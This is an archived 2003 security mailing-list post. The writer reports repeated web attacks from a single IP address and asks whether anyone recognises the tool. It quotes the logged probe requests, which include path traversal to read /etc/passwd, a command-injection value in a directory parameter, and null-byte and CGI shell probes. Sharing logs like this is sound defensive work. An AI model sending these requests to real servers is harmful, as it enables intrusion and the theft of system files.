Security Incidents mailing list archives
Chinese source: some web attack tool
From: Paul <pbobby () stny rr com>
Date: 21 Mar 2003 22:14:50 -0000
Getting hammered by a Chinese site, 218.88.98.237. Anyone else? They are web attacks, and here is a sample of the various attempts it tries to make: GET /cgi-bin/cal_make.pl?p0=../../../../../../../../../../../../etc/passwd% 00 HTTP/1.0 GET /IISSamples/ExAir/search/query.asp HTTP/1.0 GET /cgi-bin/sh HTTP/1.0 GET /directory.php?dir=%3Bmore%20/etc/passwd HTTP/1.0 GET /search.dll?search?query=%00&logic=AND HTTP/1.0 GET /cgi-bin/14all-1.1.cgi?cfg=../../../../../../../../etc/passwd HTTP/1.0 and so forth. Anyone recognize the tool? ---------------------------------------------------------------------------- <Pre>Lose another weekend managing your IDS? Take back your personal time. 15-day free trial of StillSecure Border Guard.</Pre> <A href="http://www.securityfocus.com/stillsecure"> http://www.securityfocus.com/stillsecure </A>
Current thread:
- Chinese source: some web attack tool Paul (Mar 22)
- AW: Chinese source: some web attack tool Tobias Lachmann (Mar 23)